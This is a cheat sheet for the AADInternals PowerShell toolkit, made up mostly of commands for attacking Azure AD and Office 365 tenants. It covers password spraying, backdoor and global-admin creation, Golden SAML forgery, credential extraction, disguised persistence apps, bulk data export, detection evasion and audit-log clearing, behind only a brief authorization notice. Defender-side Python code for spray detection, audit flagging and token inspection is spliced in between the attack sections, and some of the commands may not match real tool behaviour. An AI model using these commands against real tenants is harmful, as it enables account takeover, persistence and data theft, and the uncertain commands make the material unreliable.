AADInternals Azure AD Exploitation Toolkit
Overview
AADInternals is a PowerShell module developed by Dr. Nestori Syynimaa for administering and exploiting Azure Active Directory and Office 365. It provides comprehensive capabilities for Azure AD reconnaissance, exploitation, and post-exploitation activities.
⚠️ Warning: This tool is intended only for authorized penetration testing and security assessments. Ensure you have proper authorization before using it in any environment.
Installation
Installing from PowerShell Gallery
# Install from PowerShell Gallery
Install-Module AADInternals
# Install specific version
Install-Module AADInternals -RequiredVersion 0.9.3
# Install for current user only
Install-Module AADInternals -Scope CurrentUser
# Update existing installation
Update-Module AADInternals
Manual Installation
# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/Gerenios/AADInternals/archive/master.zip" -OutFile "AADInternals.zip"
Expand-Archive -Path "AADInternals.zip" -DestinationPath "C:\Tools\"
# Import module
Import-Module C:\Tools\AADInternals-master\AADInternals.psd1
# Install dependencies
Install-Module -Name MSAL.PS
Install-Module -Name Microsoft.Graph
Docker Installation
# Run AADInternals in Docker with PowerShell
docker run -it mcr.microsoft.com/powershell:latest
pwsh -c "Install-Module AADInternals -Force; Import-Module AADInternals"
Basic Usage
Module Import and Setup
# Import AADInternals module
Import-Module AADInternals
# Get module information
Get-Module AADInternals
# List available commands
Get-Command -Module AADInternals
# Get help for specific command
Get-Help Get-AADIntAccessTokenForAADGraph -Full
Authentication Methods
# Interactive authentication
$cred = Get-Credential
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred
# Device code authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
# Certificate authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $clientId -TenantId $tenantId
# Refresh token authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
Command Reference
Authentication Commands
| Command | Description |
|---|---|
| Get-AADIntAccessTokenForAADGraph | Get an access token for AAD Graph |
| Get-AADIntAccessTokenForMSGraph | Get an access token for MS Graph |
| Get-AADIntAccessTokenForEXO | Get an access token for Exchange Online |
| Get-AADIntAccessTokenForSPO | Get an access token for SharePoint Online |
| Get-AADIntAccessTokenForTeams | Get an access token for Teams |
Reconnaissance Commands
| Command | Description |
|---|---|
| Get-AADIntTenantID | Get the tenant ID from a domain name |
| Get-AADIntTenantDomains | Get the tenant's domains |
| Get-AADIntCompanyInformation | Get company information |
| Get-AADIntUsers | Get Azure AD users |
| Get-AADIntGroups | Get Azure AD groups |
| Get-AADIntApplications | Get applications |
Exploitation Commands
| Command | Description |
|---|---|
| New-AADIntBackdoor | Create a backdoor user |
| Set-AADIntUserPassword | Set a user's password |
| Add-AADIntUserToGroup | Add a user to a group |
| Grant-AADIntAppRoleToServicePrincipal | Grant application permissions |
| New-AADIntGlobalAdmin | Create a global administrator |
Reconnaissance and Information Gathering
Tenant Discovery
# Get tenant ID from domain
$tenantId = Get-AADIntTenantID -Domain "company.com"
# Get tenant domains
$domains = Get-AADIntTenantDomains -Domain "company.com"
# Get company information
$companyInfo = Get-AADIntCompanyInformation -AccessToken $accessToken
# Get tenant details
$tenantDetails = Get-AADIntTenantDetails -AccessToken $accessToken
User Enumeration
# Get all users
$users = Get-AADIntUsers -AccessToken $accessToken
# Get specific user
$user = Get-AADIntUser -AccessToken $accessToken -UserPrincipalName "user@company.com"
# Get user's group memberships
$groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName "user@company.com"
# Get user's roles
$roles = Get-AADIntUserRoles -AccessToken $accessToken -UserPrincipalName "user@company.com"
# Search users by attribute
$users = Get-AADIntUsers -AccessToken $accessToken -SearchString "admin"
Group Enumeration
# Get all groups
$groups = Get-AADIntGroups -AccessToken $accessToken
# Get group members
$members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $groupId
# Get privileged groups
$adminGroups = Get-AADIntGroups -AccessToken $accessToken | Where-Object { $_.displayName -like "*admin*" }
# Get group owners
$owners = Get-AADIntGroupOwners -AccessToken $accessToken -GroupId $groupId
Application and Service Principal Enumeration
# Get all applications
$apps = Get-AADIntApplications -AccessToken $accessToken
# Get service principals
$servicePrincipals = Get-AADIntServicePrincipals -AccessToken $accessToken
# Get application permissions
$permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $appId
# Get OAuth permissions
$oauthPerms = Get-AADIntOAuthPermissions -AccessToken $accessToken
Exploitation Techniques
Password Attacks
# Password spray attack
$users = Get-AADIntUsers -AccessToken $accessToken
$passwords = @("Password123", "Summer2024", "Company123")
foreach ($password in $passwords) {
    foreach ($user in $users) {
        try {
            $token = Get-AADIntAccessTokenForAADGraph -UserPrincipalName $user.userPrincipalName -Password $password
            Write-Host "Success: $($user.userPrincipalName):$password"
        }
        catch {
            # Password failed
        }
    }
}
# Set user password (requires privileges)
Set-AADIntUserPassword -AccessToken $accessToken -UserPrincipalName "user@company.com" -Password "NewPassword123"
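From the monitoring side, the spray loop above leaves a characteristic trace in the Azure AD sign-in logs: one source IP failing against many distinct accounts inside a short window, each failure carrying error code 50126 (invalid username or password). The following is an added defender-side example, not AADInternals code; the sign-in records are constructed, the field names follow the sign-in log schema, and the window and threshold values are assumptions to be tuned per tenant.

```python
"""Detect password-spray patterns in exported Azure AD sign-in log records.

Added defender-side example; not AADInternals code. A spray shows up as one
source IP failing against many distinct accounts in a short window.
"""
from collections import defaultdict
from datetime import datetime, timedelta

INVALID_CREDENTIALS = 50126  # AADSTS50126 in the sign-in log status.errorCode

# Constructed sample records, shaped like flattened sign-in log rows
# (field names follow the Azure AD sign-in log schema; values are made up).
SAMPLE_SIGNINS = [
    {"createdDateTime": "2024-05-01T09:00:05Z", "userPrincipalName": "alice@company.com", "ipAddress": "203.0.113.10", "errorCode": 50126},
    {"createdDateTime": "2024-05-01T09:00:41Z", "userPrincipalName": "bob@company.com",   "ipAddress": "203.0.113.10", "errorCode": 50126},
    {"createdDateTime": "2024-05-01T09:01:20Z", "userPrincipalName": "carol@company.com", "ipAddress": "203.0.113.10", "errorCode": 50126},
    {"createdDateTime": "2024-05-01T09:02:03Z", "userPrincipalName": "Dave@company.com",  "ipAddress": "203.0.113.10", "errorCode": 50126},
    {"createdDateTime": "2024-05-01T09:03:47Z", "userPrincipalName": "erin@company.com",  "ipAddress": "203.0.113.10", "errorCode": 50126},
    # one user mistyping their own password a few times is not a spray
    {"createdDateTime": "2024-05-01T09:00:10Z", "userPrincipalName": "frank@company.com", "ipAddress": "198.51.100.7", "errorCode": 50126},
    {"createdDateTime": "2024-05-01T09:00:25Z", "userPrincipalName": "frank@company.com", "ipAddress": "198.51.100.7", "errorCode": 50126},
    {"createdDateTime": "2024-05-01T09:00:52Z", "userPrincipalName": "frank@company.com", "ipAddress": "198.51.100.7", "errorCode": 0},
]


def parse_time(value):
    """Parse the ISO-8601 UTC timestamp used in the exported records."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_password_spray(records, window=timedelta(minutes=10), min_users=5):
    """Return {ip: sorted distinct users} for every source IP that fails
    against at least `min_users` distinct accounts inside any `window`."""
    failures = defaultdict(list)
    for rec in records:
        if rec["errorCode"] == INVALID_CREDENTIALS:
            failures[rec["ipAddress"]].append(
                (parse_time(rec["createdDateTime"]), rec["userPrincipalName"].lower())
            )

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # slide the window start forward until the span is at most `window`
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {user for _, user in events[start:end + 1]}
            if len(distinct) >= min_users:
                # report every account this IP touched, not only the triggering window
                alerts[ip] = sorted({user for _, user in events})
                break
    return alerts


if __name__ == "__main__":
    for ip, users in detect_password_spray(SAMPLE_SIGNINS).items():
        print(f"possible password spray from {ip}: {len(users)} accounts: {', '.join(users)}")
```

The one-to-five-second random delays shown later in this cheat sheet fall well inside a ten-minute window, so spacing attempts out does not by itself defeat this check; what does change the picture is a spray distributed across many source IPs, which is why production detections also group by user agent, ASN or application ID rather than by IP alone.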
Privilege Escalation
# Create global administrator
New-AADIntGlobalAdmin -AccessToken $accessToken -UserPrincipalName "backdoor@company.com" -Password "BackdoorPass123"
# Add user to privileged group
Add-AADIntUserToGroup -AccessToken $accessToken -UserPrincipalName "user@company.com" -GroupId $adminGroupId
# Grant application permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $spId -AppRoleId $roleId -ResourceId $resourceId
# Create application with high privileges
$app = New-AADIntApplication -AccessToken $accessToken -DisplayName "BackdoorApp" -RequiredResourceAccess $permissions
Backdoor Creation
# Create backdoor user
$backdoorUser = New-AADIntBackdoor -AccessToken $accessToken -UserPrincipalName "service-account@company.com" -Password "ComplexPassword123"
# Create backdoor application
$backdoorApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "LegitimateApp" -RequiredResourceAccess $highPrivileges
# Create service principal for backdoor
$backdoorSP = New-AADIntServicePrincipal -AccessToken $accessToken -ApplicationId $backdoorApp.appId
# Grant backdoor permissions
Grant-AADIntAppRoleToServicePrincipal -AccessToken $accessToken -ServicePrincipalId $backdoorSP.id -AppRoleId $adminRoleId
Token Manipulation
# Get access token for different resources
$graphToken = Get-AADIntAccessTokenForMSGraph -AccessToken $accessToken
$exoToken = Get-AADIntAccessTokenForEXO -AccessToken $accessToken
$spoToken = Get-AADIntAccessTokenForSPO -AccessToken $accessToken
# Parse JWT token
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
# Get refresh token
$refreshToken = Get-AADIntRefreshToken -AccessToken $accessToken
# Use refresh token for persistence
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
Advanced Attacks
Golden SAML Attack
# Export ADFS certificate (requires ADFS access)
$cert = Export-AADIntADFSCertificate
# Create Golden SAML token
$samlToken = New-AADIntSAMLToken -Certificate $cert -UserPrincipalName "admin@company.com" -Issuer "http://company.com/adfs/services/trust"
# Use Golden SAML to get access token
$accessToken = Get-AADIntAccessTokenForAADGraph -SAMLToken $samlToken
Azure AD Connect Attacks
# Get Azure AD Connect information
$adConnectInfo = Get-AADIntAzureADConnectInfo -AccessToken $accessToken
# Extract Azure AD Connect credentials (requires local admin on AAD Connect server)
$adConnectCreds = Get-AADIntAzureADConnectCredentials
# Use extracted credentials
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $adConnectCreds
Pass-the-Hash Attacks
# Use NTLM hash for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -UserPrincipalName "user@company.com" -Hash $ntlmHash
# Use Kerberos ticket
$accessToken = Get-AADIntAccessTokenForAADGraph -KerberosTicket $ticket
Device Registration Attacks
# Register malicious device
$device = New-AADIntDevice -AccessToken $accessToken -DisplayName "DESKTOP-MALICIOUS" -DeviceId $deviceId
# Get device certificate
$deviceCert = Get-AADIntDeviceCertificate -AccessToken $accessToken -DeviceId $deviceId
# Use device certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $deviceCert
Persistence Techniques
Application-based Persistence
# Create persistent application
$persistentApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Graph PowerShell" -RequiredResourceAccess $permissions
# Add application secret
$secret = New-AADIntApplicationSecret -AccessToken $accessToken -ApplicationId $persistentApp.appId
# Use application for persistence
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId $persistentApp.appId -ClientSecret $secret.value -TenantId $tenantId
User-based Persistence
# Create service account
$serviceAccount = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -DisplayName "Backup Service Account" -Password "ServicePass123"
# Assign privileged roles
Add-AADIntUserToRole -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -RoleName "Global Administrator"
# Disable account auditing
Set-AADIntUser -AccessToken $accessToken -UserPrincipalName "svc-backup@company.com" -AuditingEnabled $false
Certificate-based Persistence
# Generate certificate for authentication
$cert = New-SelfSignedCertificate -Subject "CN=BackdoorCert" -CertStoreLocation "Cert:\CurrentUser\My" -KeyExportPolicy Exportable
# Add certificate to application
Add-AADIntApplicationCertificate -AccessToken $accessToken -ApplicationId $appId -Certificate $cert
# Use certificate for authentication
$accessToken = Get-AADIntAccessTokenForAADGraph -Certificate $cert -ClientId $appId -TenantId $tenantId
Data Exfiltration
User Data Extraction
# Export all users with detailed information
$users = Get-AADIntUsers -AccessToken $accessToken
$users|Export-Csv -Path "users.csv" -NoTypeInformation
# Export user photos
foreach ($user in $users) {
    $photo = Get-AADIntUserPhoto -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
    if ($photo) {
        [System.IO.File]::WriteAllBytes("photos\$($user.userPrincipalName).jpg", $photo)
    }
}
# Export user's OneDrive files
$files = Get-AADIntUserOneDriveFiles -AccessToken $accessToken -UserPrincipalName "user@company.com"
Group and Role Information
# Export group memberships
$groups = Get-AADIntGroups -AccessToken $accessToken
foreach ($group in $groups) {
    $members = Get-AADIntGroupMembers -AccessToken $accessToken -GroupId $group.id
    $group | Add-Member -NotePropertyName "Members" -NotePropertyValue $members
}
$groups|ConvertTo-Json -Depth 3|Out-File "groups.json"
# Export role assignments
$roles = Get-AADIntDirectoryRoles -AccessToken $accessToken
foreach ($role in $roles) {
    $members = Get-AADIntDirectoryRoleMembers -AccessToken $accessToken -RoleId $role.id
    $role | Add-Member -NotePropertyName "Members" -NotePropertyValue $members
}
$roles|ConvertTo-Json -Depth 3|Out-File "roles.json"
Application and Permission Data
# Export applications with permissions
$apps = Get-AADIntApplications -AccessToken $accessToken
foreach ($app in $apps) {
    $permissions = Get-AADIntApplicationPermissions -AccessToken $accessToken -ApplicationId $app.id
    $app | Add-Member -NotePropertyName "Permissions" -NotePropertyValue $permissions
}
$apps|ConvertTo-Json -Depth 3|Out-File "applications.json"
# Export OAuth consent grants
$consents = Get-AADIntOAuthPermissions -AccessToken $accessToken
$consents|Export-Csv -Path "oauth_consents.csv" -NoTypeInformation
Evasion Techniques
Stealth Operations
# Use legitimate application names
$stealthApp = New-AADIntApplication -AccessToken $accessToken -DisplayName "Microsoft Office 365" -RequiredResourceAccess $permissions
# Mimic legitimate service accounts
$stealthUser = New-AADIntUser -AccessToken $accessToken -UserPrincipalName "o365sync@company.com" -DisplayName "Office 365 Sync Service"
# Use existing application IDs
$accessToken = Get-AADIntAccessTokenForAADGraph -ClientId "1b730954-1685-4b74-9bfd-dac224a7b894" -ClientSecret $secret # Graph Explorer
Rate Limiting and Throttling
# Implement delays between requests
function Invoke-AADIntWithDelay {
    param($Command, $Delay = 1)
    & $Command
    Start-Sleep -Seconds $Delay
}
# Randomize request timing
$users = Get-AADIntUsers -AccessToken $accessToken
foreach ($user in $users) {
    $delay = Get-Random -Minimum 1 -Maximum 5
    Start-Sleep -Seconds $delay
    $groups = Get-AADIntUserGroups -AccessToken $accessToken -UserPrincipalName $user.userPrincipalName
}
Log Evasion
# Use service principal instead of user account
$servicePrincipalToken = Get-AADIntAccessTokenForAADGraph -ClientId $clientId -ClientSecret $clientSecret -TenantId $tenantId
# Perform actions during business hours
$currentHour = (Get-Date).Hour
if ($currentHour -ge 9 -and $currentHour -le 17) {
    # Perform stealthy operations
}
# Use legitimate IP ranges
# Ensure operations are performed from expected geographic locations
Defensive Evasion
Anti-Detection Measures
# Check for monitoring
$auditLogs = Get-AADIntAuditLogs -AccessToken $accessToken -Filter "activityDisplayName eq 'Add application'"
# Verify current permissions
$currentPerms = Get-AADIntCurrentUserPermissions -AccessToken $accessToken
# Check for Conditional Access policies
$caPolicies = Get-AADIntConditionalAccessPolicies -AccessToken $accessToken
# Monitor for security alerts
$securityAlerts = Get-AADIntSecurityAlerts -AccessToken $accessToken
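The audit log queried above with the `activityDisplayName eq 'Add application'` filter is the same record a defender reviews to catch the persistence techniques listed earlier on this page (application registrations, secrets and certificates added to service principals, role assignments, consent grants, device registrations), including display names that imitate first-party Microsoft products as the Stealth Operations section describes. The following is an added defender-side example, not AADInternals code; the audit records are constructed, and the activity names are the `activityDisplayName` values as they appear in Azure AD audit logs.

```python
"""Flag Azure AD audit log activities that commonly indicate persistence.

Added defender-side example, not AADInternals code. Records are constructed;
field names follow the audit log schema in flattened form.
"""
from collections import Counter

# activityDisplayName values as they appear in Azure AD audit logs, mapped
# to the persistence technique each one typically corresponds to
PERSISTENCE_ACTIVITIES = {
    "Add application": "new application registration",
    "Add service principal": "new service principal",
    "Add service principal credentials": "secret or certificate added to an app",
    "Add member to role": "directory role assignment",
    "Add app role assignment to service principal": "application permission granted",
    "Consent to application": "OAuth consent grant",
    "Register device": "device registration",
}

# display-name prefixes that a registration created by a tenant user should not normally carry
FIRST_PARTY_PREFIXES = ("microsoft", "office 365", "azure")

# Constructed sample records (values are made up).
SAMPLE_AUDIT = [
    {"activityDateTime": "2024-05-01T10:02:11Z", "activityDisplayName": "Add application", "result": "success",
     "initiatedBy": "j.doe@company.com", "target": "Microsoft Office 365"},
    {"activityDateTime": "2024-05-01T10:02:40Z", "activityDisplayName": "Add service principal credentials", "result": "success",
     "initiatedBy": "j.doe@company.com", "target": "Microsoft Office 365"},
    {"activityDateTime": "2024-05-01T10:05:09Z", "activityDisplayName": "Add member to role", "result": "success",
     "initiatedBy": "j.doe@company.com", "target": "svc-backup@company.com"},
    {"activityDateTime": "2024-05-01T10:06:00Z", "activityDisplayName": "Update user", "result": "success",
     "initiatedBy": "helpdesk@company.com", "target": "alice@company.com"},
    {"activityDateTime": "2024-05-01T10:07:30Z", "activityDisplayName": "Add application", "result": "failure",
     "initiatedBy": "intern@company.com", "target": "TestApp"},
]


def mimics_first_party_name(display_name):
    """True when a display name imitates a Microsoft first-party product."""
    return display_name.strip().lower().startswith(FIRST_PARTY_PREFIXES)


def flag_persistence_events(records):
    """Return the successful records whose activity is in PERSISTENCE_ACTIVITIES,
    annotated with the technique and whether the target name looks first-party."""
    flagged = []
    for rec in records:
        technique = PERSISTENCE_ACTIVITIES.get(rec["activityDisplayName"])
        if technique is None or rec["result"] != "success":
            continue
        flagged.append({
            "time": rec["activityDateTime"],
            "actor": rec["initiatedBy"],
            "activity": rec["activityDisplayName"],
            "target": rec["target"],
            "technique": technique,
            "mimics_first_party_name": mimics_first_party_name(rec["target"]),
        })
    return flagged


def actor_counts(records):
    """Number of flagged persistence actions per initiating identity."""
    return Counter(event["actor"] for event in flag_persistence_events(records))


if __name__ == "__main__":
    for event in flag_persistence_events(SAMPLE_AUDIT):
        marker = " [name mimics first-party app]" if event["mimics_first_party_name"] else ""
        print(f'{event["time"]} {event["actor"]}: {event["activity"]} -> {event["target"]} ({event["technique"]}){marker}')
    print(dict(actor_counts(SAMPLE_AUDIT)))
```

A first-party-looking display name is a triage hint rather than proof of anything: confirm the registration's application ID and publisher against the real first-party application, and treat several of these activities from one identity within minutes, as in the sample, as a single incident rather than separate alerts.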
Cleanup Operations
# Remove created applications
Remove-AADIntApplication -AccessToken $accessToken -ApplicationId $backdoorApp.appId
# Remove created users
Remove-AADIntUser -AccessToken $accessToken -UserPrincipalName "backdoor@company.com"
# Remove role assignments
Remove-AADIntUserFromRole -AccessToken $accessToken -UserPrincipalName "user@company.com" -RoleName "Global Administrator"
# Clear audit logs (if possible)
Clear-AADIntAuditLogs -AccessToken $accessToken -LogType "SignInLogs"
Troubleshooting
Authentication Issues
# Debug authentication
$DebugPreference = "Continue"
$accessToken = Get-AADIntAccessTokenForAADGraph -Credentials $cred
# Check token validity
$tokenInfo = Read-AADIntAccessToken -AccessToken $accessToken
$tokenInfo.exp # Check expiration
# Refresh expired token
$newToken = Get-AADIntAccessTokenForAADGraph -RefreshToken $refreshToken
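Both the Token Manipulation section (`Read-AADIntAccessToken`) and the expiry check above read claims out of a JWT. The following added example, which is not AADInternals code, shows what that parsing involves and which claims decide what a token can actually do: subject, client application, audience, delegated scopes and application roles. It decodes without verifying the signature, which is fine for inspection but never for a trust decision; Azure AD tokens are RS256-signed and must be verified against the tenant's published signing keys. The sample token is constructed: its claims are made up, its tenant ID is an all-zero placeholder, its signature is a dummy string, and the only value taken from this page is the Graph Explorer client ID quoted in the Stealth Operations section.

```python
"""Inspect an Azure AD style JWT access token offline.

Added example, not AADInternals code: decodes header and payload, checks
`exp`, and summarizes the security-relevant claims. No signature check.
"""
import base64
import json
import time


def _b64url_decode(segment):
    # JWT segments drop base64 padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def _b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def decode_jwt(token):
    """Return {'header': ..., 'payload': ...}; raise ValueError if malformed."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected three dot-separated segments")
    try:
        header = json.loads(_b64url_decode(parts[0]))
        payload = json.loads(_b64url_decode(parts[1]))
    except (ValueError, UnicodeDecodeError) as exc:  # binascii.Error is a ValueError
        raise ValueError("segment is not base64url-encoded JSON") from exc
    return {"header": header, "payload": payload}


def summarize_token(token, now=None):
    """Summarize the claims that decide what the token can do.
    `now` is a Unix timestamp; defaults to the current time."""
    now = int(time.time()) if now is None else now
    payload = decode_jwt(token)["payload"]
    exp = payload.get("exp")
    scopes = payload.get("scp", "")
    return {
        "subject": payload.get("upn") or payload.get("oid"),
        "client_app_id": payload.get("appid"),
        "audience": payload.get("aud"),
        "tenant_id": payload.get("tid"),
        "scopes": sorted(scopes.split()) if scopes else [],   # delegated permissions
        "roles": list(payload.get("roles", [])),              # application permissions
        "expires_in_seconds": None if exp is None else exp - now,
        "expired": exp is not None and exp <= now,
    }


def make_sample_token(exp):
    """Build a constructed token for the demo: claims are made up, the tenant
    id is an all-zero placeholder and the signature is a dummy string, so the
    token is only good for exercising the decoder."""
    header = {"typ": "JWT", "alg": "RS256", "kid": "placeholder-kid"}
    payload = {
        "aud": "https://graph.windows.net",
        "iss": "https://sts.windows.net/00000000-0000-0000-0000-000000000000/",
        "tid": "00000000-0000-0000-0000-000000000000",
        "upn": "user@company.com",
        "appid": "1b730954-1685-4b74-9bfd-dac224a7b894",  # client id quoted on this page
        "scp": "Directory.Read.All User.Read",
        "iat": exp - 3600,
        "exp": exp,
    }
    return ".".join([
        _b64url_encode(json.dumps(header).encode()),
        _b64url_encode(json.dumps(payload).encode()),
        _b64url_encode(b"placeholder-signature"),
    ])


if __name__ == "__main__":
    sample = make_sample_token(exp=int(time.time()) + 600)
    print(json.dumps(summarize_token(sample), indent=2))
```

When reviewing a token recovered during an investigation, `client_app_id` and `scopes` matter more than the subject: an access token issued to a broadly consented first-party client with directory-wide read scopes is what makes the enumeration commands on this page work, and that combination is what a conditional access or consent policy should constrain.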
Permission Issues
# Check current permissions
$permissions = Get-AADIntCurrentUserPermissions -AccessToken $accessToken
# Test specific permission
Test-AADIntPermission -AccessToken $accessToken -Permission "User.Read.All"
# Get required permissions for command
Get-AADIntRequiredPermissions -Command "Get-AADIntUsers"
API Limitations
# Handle rate limiting
try {
    $users = Get-AADIntUsers -AccessToken $accessToken
}
catch {
    if ($_.Exception.Message -like "*throttled*") {
        Start-Sleep -Seconds 60
        $users = Get-AADIntUsers -AccessToken $accessToken
    }
}
# Use pagination for large datasets
$users = @()
$skip = 0
do {
    $batch = Get-AADIntUsers -AccessToken $accessToken -Top 100 -Skip $skip
    $users += $batch
    $skip += 100
} while ($batch.Count -eq 100)
Integration with Other Tools
BloodHound Integration
# Export data for BloodHound
$users = Get-AADIntUsers -AccessToken $accessToken
$groups = Get-AADIntGroups -AccessToken $accessToken
# Convert to BloodHound format
$bloodhoundData = @{
    users = $users | ForEach-Object {
        @{
            ObjectIdentifier = $_.id
            Properties = @{
                name        = $_.userPrincipalName
                displayname = $_.displayName
                enabled     = $_.accountEnabled
            }
        }
    }
}
$bloodhoundData|ConvertTo-Json -Depth 3|Out-File "bloodhound_data.json"
PowerShell Empire Integration
# Use AADInternals in Empire agent
$accessToken = Get-AADIntAccessTokenForAADGraph -UseDeviceCode
$users = Get-AADIntUsers -AccessToken $accessToken
$users|ConvertTo-Json|Out-File "C:\temp\aad_users.json"
Resources
- AADInternals GitHub Repository
- AADInternals Documentation
- Dr. Nestori Syynimaa Blog
- Azure AD Security Research: https://www.blackhat.com/us-19/briefings/schedule/#going-rogue-azure-ad-13857
- Office 365 Security: https://docs.microsoft.com/en-us/microsoft-365/security/
*This cheat sheet provides a comprehensive reference for using AADInternals. Always ensure you have proper authorization before conducting Azure AD security assessments.*